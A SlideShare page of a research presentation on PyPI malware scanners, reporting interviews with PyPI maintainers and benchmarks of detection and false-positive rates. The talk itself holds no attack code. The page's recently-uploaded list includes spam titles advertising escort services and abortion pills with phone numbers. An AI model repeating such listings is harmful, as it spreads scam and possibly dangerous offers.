SlideShare a Scribd company logo
1 of 18
Bad Snakes:
Understanding and Improving Python Package Index
Malware Scanning
D.L. Vu1,2 Zachary Newman1 John Speed Meyers1
1Chainguard, USA, 2FPT University, Vietnam
5/18/2023
Bad Snakes: Understanding and Improving Python Package
Index Malware Scanning
1
lyvd@fe.edu.vn zjn@chainguard.dev jsmeyers@chainguard.dev
Problem Statement
● An increasing number of malware on open source package repositories,
specifically PyPI.
● Academic and commercial tools that can detect malicious open source software
packages starts to sound like a magic wand that could make these problems
disappear.
● But, are these tools the cure to these malicious packages?
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 2
Our study
• We spoke to administrators of and contributors to PyPI, the main repository for
Python packages, along with an academic researcher who works on this problem.
• We conducted an empirical research of malware detection tools to see how they
measured up to the requirements of real package repositories.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 3
Takeaways
• These tools aren’t suitable to run on open source software repositories
automatically, in large part because they’re too noisy.
• External researchers can (and do) run their own tools in their own environments
and send reports to get malware removed.
• This often works out better for everybody involved.
• There are promising directions for improving these scanners, and other, even
more promising techniques for improving software repository security that
administrators are working toward right now.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 4
Interviews
• We checked in with members of the PyPI community and supply-chain security
researchers to see what it would take to deploy malware detection techniques on
package repositories.
• PyPI deployed an experimental “malware checks” system in 2020, so our interviewees
(an administrator of PyPI, and one developer of the malware check system) have direct
experience with running malware detection for a real repository. However, these checks
aren’t used anymore.
• We sought to find out why not, and what it would take to deploy such a system again.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 5
False positive rates matter more than false
negative rates
• Many researchers build systems designed to catch all or most malware: after all,
we don’t want to let bad packages through.
• They accept a low false-positive rate as the price to pay to catch bad actors.
• However, given the number of legitimate packages published, even seemingly-
low rates (like 5%) require administrators to manually inspect thousands of
packages each week.
• An automated tool needs to have an “effectively zero” rate.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 7
Repository administrators must balance
multiple security priorities
• PyPI and similar repositories must weigh automated malware detection against
software signing and multi-factor authentication.
• Most malware packages affect few or no actual users, PyPI administrators have
decided to use their finite resources to focus on higher impact projects.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 8
Just because PyPI isn’t running these checks
doesn’t mean that others aren’t.
• Security researchers develop and operate Python malware detection systems
using their own time and computing resources, providing reports to PyPI when
they detect malicious packages.
• PyPI maintainers benefit with high-quality, low-noise reports on malware, and the
security researchers benefit from positive coverage of their company, products,
and services.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 9
Benchmarking Different Malware Detection
Approaches
• To understand if existing systems were appropriate for this setting, we ran some
experiments comparing different Python malware detection approaches.
• These systems include static analysis tools that analyze source code, dynamic analysis
tools that observe running software, and metadata analysis tools that look at things like
package names.
• We found three Python malware detection tools which met our criteria:
Bandit4Mal, OSSGadget OSS Detect Backdoor, and PyPI Malware Checks.
• We used a benchmark dataset including 168 malware packages (courtesy of the
Backstabber's Knife Collection and MALOSS datasets), 1,430 popular packages, and
986 randomly-selected packages.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 10
How do malware
detection approaches
perform?
• We scanned these packages with each chosen tool,
recording all alerts produced by the setup.py files (which can
run malicious code at package installation time) as well as
the entire package (for malicious code that executes at
runtime).
• We consider an alert for a malicious package a true positive
and an alert for a benign package a false positive.
5/18/2023
Bad Snakes: Understanding and Improving Python Package
Index Malware Scanning
13
Scanners catch the
majority of malicious
packages.
• All three of these tools had true positive rates above 50%
• When including all Python files, the tools detected over
85% of malicious packages.
5/18/2023
Bad Snakes: Understanding and Improving Python Package
Index Malware Scanning
14
False positive rates are
high (sometimes higher
than true positive rates)
• The measured tools have false positive rates between 15% and 97%.
• The false positive rate increases (sometimes higher than the true
positive rate for malicious packages) when checking all files, rather
than just setup.py files.
• This suggests that many rules used by these tools are designed to
catch behavior that is suspicious in setup.py files, but normal in
package code.
5/18/2023
Bad Snakes: Understanding and Improving Python Package
Index Malware Scanning
15
When it rains, it pours: packages with one alert
often have many more.
• The tools can fire multiple alerts per package, and they did.
• Scanning the setup.py files of benign packages, we find that all tools have a median of 3
or fewer alerts.
• When scanning all Python files, the number of alerts increases to between 10 and 85.
• The noisiest benign package had 145,799 alerts.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 16
Making the alerts more strict results in missing
a lot of malware
• Rather than flagging a package as possibly malicious if it has any alerts, we tried
requiring a threshold number of alerts.
• We found that with a higher threshold, the tools report very few (or even no)
malicious packages even before the true positive rates became manageable.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 17
Some rules are better than others
• Some rules are better than others. One of the rules checks for networking code in
unexpected places. These types of checks were a good indicator of a malicious
package.
• Other rules, which looked for metaprogramming or running external processes,
were less effective in distinguishing malicious and benign code.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 18
The tools ran reasonably fast
• Tested on a laptop, processing a typical package took well under 10 seconds.
• This is too slow to run before a package upload finishes but is quite reasonable to
passively analyze a repository.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 19
Potential directions for better scanning
• Prioritize higher-impact packages: typosquatters, shrinkwrapped clones, and popular
packages.
• Consider dynamic scanning techniques, running code in a sandbox
• Make sure tools are easy to interpret. “6 alerts” is hard to evaluate; “makes network calls
to these domains,” less so.
• Most importantly, don’t expect volunteer repository administrators to maintain and run
tools for you; instead, form a relationship and plan to work together in the long haul.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 20
Conclusions
• The primary lesson from our interviews and experiments is to listen to maintainers.
• Researchers should engage with maintainers, who can outline requirements for practical
systems, and who have endless ideas worth exploring
• We remain optimistic about open-source software security. Organizations like the
OpenSSF do listen to maintainers while providing resources for academics, maintainers,
and companies to collaborate.
• As long as we listen to what the community has to say, open-source security will steadily
improve.
5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 21

More Related Content

Similar to icse-presentation.pptx

Application of data mining based malicious code detection techniques for dete...
Application of data mining based malicious code detection techniques for dete...Application of data mining based malicious code detection techniques for dete...
Application of data mining based malicious code detection techniques for dete...UltraUploader
 
DETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMS
DETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMSDETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMS
DETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMSAAKANKSHA JAIN
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and AnalysisPrashant Chopra
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIArash Ramez
 
Cyber Defense Forensic Analyst - Real World Hands-on Examples
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesCyber Defense Forensic Analyst - Real World Hands-on Examples
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesSandeep Kumar Seeram
 
Mr201311 behavioral-based malware clustering (English)
Mr201311 behavioral-based malware clustering (English)Mr201311 behavioral-based malware clustering (English)
Mr201311 behavioral-based malware clustering (English)FFRI, Inc.
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...kumarpriyanshu81
 
Dev Secops Software Supply Chain
Dev Secops Software Supply ChainDev Secops Software Supply Chain
Dev Secops Software Supply ChainCameron Townshend
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
7 Bug Bounty Myths, BUSTED
7 Bug Bounty Myths, BUSTED7 Bug Bounty Myths, BUSTED
7 Bug Bounty Myths, BUSTEDbugcrowd
 
Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019
Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019
Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019Cameron Townshend
 
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscapeDevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscapeDevSecCon
 
Design and Development of an Efficient Malware Detection Using ML
Design and Development of an Efficient Malware Detection Using MLDesign and Development of an Efficient Malware Detection Using ML
Design and Development of an Efficient Malware Detection Using MLSiva krishnam raju Patsamatla
 
Applications of genetic algorithms to malware detection and creation
Applications of genetic algorithms to malware detection and creationApplications of genetic algorithms to malware detection and creation
Applications of genetic algorithms to malware detection and creationUltraUploader
 
Bug bounties - cén scéal?
Bug bounties - cén scéal?Bug bounties - cén scéal?
Bug bounties - cén scéal?Ciaran McNally
 
Automatically generated win32 heuristic virus detection
Automatically generated win32 heuristic virus detectionAutomatically generated win32 heuristic virus detection
Automatically generated win32 heuristic virus detectionUltraUploader
 
Open Source Insight: Balancing Agility and Open Source Security for DevOps
Open Source Insight: Balancing Agility and Open Source Security for DevOpsOpen Source Insight: Balancing Agility and Open Source Security for DevOps
Open Source Insight: Balancing Agility and Open Source Security for DevOpsBlack Duck by Synopsys
 

Similar to icse-presentation.pptx (20)

Application of data mining based malicious code detection techniques for dete...
Application of data mining based malicious code detection techniques for dete...Application of data mining based malicious code detection techniques for dete...
Application of data mining based malicious code detection techniques for dete...
 
DETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMS
DETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMSDETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMS
DETECTION OF MALICIOUS EXECUTABLES USING RULE BASED CLASSIFICATION ALGORITHMS
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and Analysis
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
 
Mining apps for anomalies
Mining apps for anomaliesMining apps for anomalies
Mining apps for anomalies
 
Cyber Defense Forensic Analyst - Real World Hands-on Examples
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesCyber Defense Forensic Analyst - Real World Hands-on Examples
Cyber Defense Forensic Analyst - Real World Hands-on Examples
 
Mr201311 behavioral-based malware clustering (English)
Mr201311 behavioral-based malware clustering (English)Mr201311 behavioral-based malware clustering (English)
Mr201311 behavioral-based malware clustering (English)
 
Supply Chainsaw
Supply ChainsawSupply Chainsaw
Supply Chainsaw
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda Security
 
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
 
Dev Secops Software Supply Chain
Dev Secops Software Supply ChainDev Secops Software Supply Chain
Dev Secops Software Supply Chain
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
 
7 Bug Bounty Myths, BUSTED
7 Bug Bounty Myths, BUSTED7 Bug Bounty Myths, BUSTED
7 Bug Bounty Myths, BUSTED
 
Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019
Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019
Security Software Supply Chains - Sonatype - DevSecCon Singapore March 2019
 
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscapeDevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
 
Design and Development of an Efficient Malware Detection Using ML
Design and Development of an Efficient Malware Detection Using MLDesign and Development of an Efficient Malware Detection Using ML
Design and Development of an Efficient Malware Detection Using ML
 
Applications of genetic algorithms to malware detection and creation
Applications of genetic algorithms to malware detection and creationApplications of genetic algorithms to malware detection and creation
Applications of genetic algorithms to malware detection and creation
 
Bug bounties - cén scéal?
Bug bounties - cén scéal?Bug bounties - cén scéal?
Bug bounties - cén scéal?
 
Automatically generated win32 heuristic virus detection
Automatically generated win32 heuristic virus detectionAutomatically generated win32 heuristic virus detection
Automatically generated win32 heuristic virus detection
 
Open Source Insight: Balancing Agility and Open Source Security for DevOps
Open Source Insight: Balancing Agility and Open Source Security for DevOpsOpen Source Insight: Balancing Agility and Open Source Security for DevOps
Open Source Insight: Balancing Agility and Open Source Security for DevOps
 

Recently uploaded

TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 

Recently uploaded (20)

TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 

icse-presentation.pptx

  • 1. Bad Snakes: Understanding and Improving Python Package Index Malware Scanning D.L. Vu1,2 Zachary Newman1 John Speed Meyers1 1Chainguard, USA, 2FPT University, Vietnam 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 1 lyvd@fe.edu.vn zjn@chainguard.dev jsmeyers@chainguard.dev
  • 2. Problem Statement ● An increasing number of malware on open source package repositories, specifically PyPI. ● Academic and commercial tools that can detect malicious open source software packages starts to sound like a magic wand that could make these problems disappear. ● But, are these tools the cure to these malicious packages? 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 2
  • 3. Our study • We spoke to administrators of and contributors to PyPI, the main repository for Python packages, along with an academic researcher who works on this problem. • We conducted an empirical research of malware detection tools to see how they measured up to the requirements of real package repositories. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 3
  • 4. Takeaways • These tools aren’t suitable to run on open source software repositories automatically, in large part because they’re too noisy. • External researchers can (and do) run their own tools in their own environments and send reports to get malware removed. • This often works out better for everybody involved. • There are promising directions for improving these scanners, and other, even more promising techniques for improving software repository security that administrators are working toward right now. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 4
  • 5. Interviews • We checked in with members of the PyPI community and supply-chain security researchers to see what it would take to deploy malware detection techniques on package repositories. • PyPI deployed an experimental “malware checks” system in 2020, so our interviewees (an administrator of PyPI, and one developer of the malware check system) have direct experience with running malware detection for a real repository. However, these checks aren’t used anymore. • We sought to find out why not, and what it would take to deploy such a system again. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 5
  • 6. False positive rates matter more than false negative rates • Many researchers build systems designed to catch all or most malware: after all, we don’t want to let bad packages through. • They accept a low false-positive rate as the price to pay to catch bad actors. • However, given the number of legitimate packages published, even seemingly- low rates (like 5%) require administrators to manually inspect thousands of packages each week. • An automated tool needs to have an “effectively zero” rate. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 7
  • 7. Repository administrators must balance multiple security priorities • PyPI and similar repositories must weigh automated malware detection against software signing and multi-factor authentication. • Most malware packages affect few or no actual users, PyPI administrators have decided to use their finite resources to focus on higher impact projects. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 8
  • 8. Just because PyPI isn’t running these checks doesn’t mean that others aren’t. • Security researchers develop and operate Python malware detection systems using their own time and computing resources, providing reports to PyPI when they detect malicious packages. • PyPI maintainers benefit with high-quality, low-noise reports on malware, and the security researchers benefit from positive coverage of their company, products, and services. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 9
  • 9. Benchmarking Different Malware Detection Approaches • To understand if existing systems were appropriate for this setting, we ran some experiments comparing different Python malware detection approaches. • These systems include static analysis tools that analyze source code, dynamic analysis tools that observe running software, and metadata analysis tools that look at things like package names. • We found three Python malware detection tools which met our criteria: Bandit4Mal, OSSGadget OSS Detect Backdoor, and PyPI Malware Checks. • We used a benchmark dataset including 168 malware packages (courtesy of the Backstabber's Knife Collection and MALOSS datasets), 1,430 popular packages, and 986 randomly-selected packages. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 10
  • 10. How do malware detection approaches perform? • We scanned these packages with each chosen tool, recording all alerts produced by the setup.py files (which can run malicious code at package installation time) as well as the entire package (for malicious code that executes at runtime). • We consider an alert for a malicious package a true positive and an alert for a benign package a false positive. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 13
  • 11. Scanners catch the majority of malicious packages. • All three of these tools had true positive rates above 50% • When including all Python files, the tools detected over 85% of malicious packages. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 14
  • 12. False positive rates are high (sometimes higher than true positive rates) • The measured tools have false positive rates between 15% and 97%. • The false positive rate increases (sometimes higher than the true positive rate for malicious packages) when checking all files, rather than just setup.py files. • This suggests that many rules used by these tools are designed to catch behavior that is suspicious in setup.py files, but normal in package code. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 15
  • 13. When it rains, it pours: packages with one alert often have many more. • The tools can fire multiple alerts per package, and they did. • Scanning the setup.py files of benign packages, we find that all tools have a median of 3 or fewer alerts. • When scanning all Python files, the number of alerts increases to between 10 and 85. • The noisiest benign package had 145,799 alerts. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 16
  • 14. Making the alerts more strict results in missing a lot of malware • Rather than flagging a package as possibly malicious if it has any alerts, we tried requiring a threshold number of alerts. • We found that with a higher threshold, the tools report very few (or even no) malicious packages even before the true positive rates became manageable. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 17
  • 15. Some rules are better than others • Some rules are better than others. One of the rules checks for networking code in unexpected places. These types of checks were a good indicator of a malicious package. • Other rules, which looked for metaprogramming or running external processes, were less effective in distinguishing malicious and benign code. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 18
  • 16. The tools ran reasonably fast • Tested on a laptop, processing a typical package took well under 10 seconds. • This is too slow to run before a package upload finishes but is quite reasonable to passively analyze a repository. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 19
